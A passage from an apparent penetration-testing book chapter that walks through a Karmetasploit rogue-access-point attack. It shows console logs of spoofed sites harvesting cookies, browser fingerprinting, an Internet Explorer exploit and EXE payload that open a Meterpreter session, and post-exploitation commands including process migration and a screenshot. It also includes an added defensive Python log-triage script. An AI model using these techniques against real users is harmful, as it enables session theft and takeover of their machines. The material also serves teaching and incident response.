At this point, the user has no new messages, so he decides to do some web browsing. When the browser opens, a captive portal is presented to the user, as shown in Figure 12-1.
As the user sits in front of his computer wondering what’s going on, Karmetasploit is busy configuring the attack to capture cookies; set up fake email, DNS, and other servers; and launch exploits against the client’s browser—all the result of the magic contained in our karma.rc file.
Of course, some degree of luck is involved in this attack. The browser will display a “Loading” page while exploits are launched. If the user is impatient, he may simply close the browser window, which will stop our exploits.
Next, you can see the massive amount of output that results from this attack:
[*] HTTP REQUEST 10.0.0.100 > www.microsoft.com:80 GET /isapi/redir.dll Windows IE 6.0 cookies=WT_NVR=0=/:1=downloads:2=downloads/en; WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] Request '/ads' from 10.0.0.100:1371
[*] HTTP REQUEST 10.0.0.100 > adwords.google.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > blogger.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > careerbuilder.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 6.0 cookies=
. . . SNIP . . .
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo%3d' from 10.0.0.100:1371
[*] JavaScript Report: Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2:
[*] Responding with exploits
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 10.0.0.100:1371...
[*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
. . . SNIP . . .
[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203; MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE
[*] Sending EXE payload to 10.0.0.100:1371...
[*] Sending stage (748032 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)
In this output, you can see that Metasploit first lets the client know that various popular websites are in fact located on the attacking machine (the run of HTTP REQUEST lines for /forms.html, each of which the browser answers with whatever cookies it holds for that site). Then, through the request to /ads?sessid=, it uses JavaScript to determine the target’s operating system and browser (the JavaScript Report line), and responds with exploits based on that fingerprint. The client is then presented with a malicious ActiveX control, resulting in the familiar yellow prompt bar in Internet Explorer, shown at the top of Figure 12-1. You can also see buried in the output that an exploit was launched against the client (the Internet Explorer COM CreateObject Code Execution line). After a brief period, you see that the exploit was successful and a Meterpreter session has been opened on the target PC!
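As an added example (not part of the book's output and not Karmetasploit's own code), the following Python script parses log lines in the format shown above the way an incident responder would when working out what a victim exposed: which spoofed hosts received cookies over plain HTTP and which cookie names, the browser fingerprint carried base64-encoded in the sessid of the /ads request, how many ActiveX download attempts were logged, which exploit page was sent, and whether a session was opened. The sample log is constructed from a few of the lines above with the cookie values shortened; the regular expressions and the field names in the returned dictionary are my own assumptions about the format, not anything documented by the tool.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample, shaped like the Karmetasploit console output reproduced above
# (same line formats, a handful of representative lines, cookie values shortened).
SAMPLE_LOG = """\
[*] HTTP REQUEST 10.0.0.100 > www.microsoft.com:80 GET /isapi/redir.dll Windows IE 6.0 cookies=WT_NVR=0=/:1=downloads:2=downloads/en; MUID=C7149D932C86418EBC913CE45C4326AE
[*] Request '/ads' from 10.0.0.100:1371
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 6.0 cookies=
. . . SNIP . . .
[*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo%3d' from 10.0.0.100:1371
[*] JavaScript Report: Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2:
[*] Responding with exploits
[*] HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=MUID=C7149D932C86418EBC913CE45C4326AE
[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 10.0.0.100:1371...
[*] Sending EXE payload to 10.0.0.100:1371...
[*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)
"""

# Line patterns (assumed from the output shown on this page, not a documented format).
HTTP_RE = re.compile(r"^\[\*\] HTTP REQUEST (?P<client>\S+) > (?P<host>[^:\s]+):(?P<port>\d+) "
                     r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<ua>.*?) cookies=(?P<cookies>.*)$")
ADS_RE = re.compile(r"^\[\*\] Request '(?P<path>[^']*)' from (?P<client>[^:\s]+):\d+")
ACTIVEX_RE = re.compile(r"^\[\*\] HTTP (?P<client>\S+) attempted to download an ActiveX control")
EXPLOIT_RE = re.compile(r"^\[\*\] Sending (?P<name>.+?) exploit HTML to (?P<client>[^:\s]+):\d+")
SESSION_RE = re.compile(r"^\[\*\] Meterpreter session (?P<sid>\d+) opened \(\S+ -> (?P<client>[^:\s]+):\d+\)")


def decode_sessid(sessid):
    """The /ads?sessid= value is the browser fingerprint: base64, then URL-encoded."""
    raw = base64.b64decode(unquote(sessid))
    return raw.decode("ascii", errors="replace")


def cookie_names(cookie_field):
    """Names from an 'a=1; b=2' cookie field; an empty field means nothing was exposed."""
    names = []
    for pair in cookie_field.split(";"):
        pair = pair.strip()
        if pair:
            names.append(pair.split("=", 1)[0])
    return names


def _new_client():
    return {"hosts_probed": set(), "cookies": {}, "fingerprint": None,
            "activex_attempts": 0, "exploits_sent": [], "sessions": []}


def triage(log_text):
    """Summarise, per victim IP, what the log shows was exposed and what happened."""
    clients = defaultdict(_new_client)
    for line in log_text.splitlines():
        m = HTTP_RE.match(line)
        if m:
            c = clients[m["client"]]
            c["hosts_probed"].add(m["host"])
            names = cookie_names(m["cookies"])
            if names:
                # Cookies sent in clear text to a host the attacker impersonates count as exposed.
                exposed = c["cookies"].setdefault(m["host"], [])
                for n in names:
                    if n not in exposed:
                        exposed.append(n)
            continue
        m = ADS_RE.match(line)
        if m:
            sessid = parse_qs(urlsplit(m["path"]).query).get("sessid")
            if sessid:  # the bare '/ads' request carries no fingerprint yet
                clients[m["client"]]["fingerprint"] = decode_sessid(sessid[0])
            continue
        m = ACTIVEX_RE.match(line)
        if m:
            clients[m["client"]]["activex_attempts"] += 1
            continue
        m = EXPLOIT_RE.match(line)
        if m:
            clients[m["client"]]["exploits_sent"].append(m["name"])
            continue
        m = SESSION_RE.match(line)
        if m:
            clients[m["client"]]["sessions"].append(int(m["sid"]))
    return dict(clients)


if __name__ == "__main__":
    for ip, info in triage(SAMPLE_LOG).items():
        print(f"victim {ip}: fingerprint={info['fingerprint']}")
        print(f"  hosts probed: {sorted(info['hosts_probed'])}")
        print(f"  cookies exposed: {info['cookies']}")
        print(f"  ActiveX attempts: {info['activex_attempts']}, exploits: {info['exploits_sent']}, "
              f"sessions: {info['sessions']}")
```

Decoding the sessid yields exactly the string on the JavaScript Report line, which shows that the fingerprint is simply carried back to the attacker in the URL of the /ads request; the hosts with an empty cookies= field are the sites the victim's browser was made to contact but had no stored cookies for, which is the distinction a responder needs when deciding which accounts to treat as compromised.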
Returning to msfconsole, we can interact with the session that was created and check to see what permissions we have obtained on the target. Remember, when you exploit a browser it’s always a good idea to migrate your process out of the web browser in case it gets closed.
meterpreter > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: V-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > getuid
Server username: V-XP-SP2-BARE\Administrator
meterpreter > run migrate -f
[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2232
[*] New server process: notepad.exe (2232)
meterpreter > screenshot
Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg
meterpreter >
Because this is a default installation of Windows XP SP2 with the very insecure Internet Explorer 6 installed (both of which are highly out of date), the client didn’t even need to accept and install the malicious ActiveX control.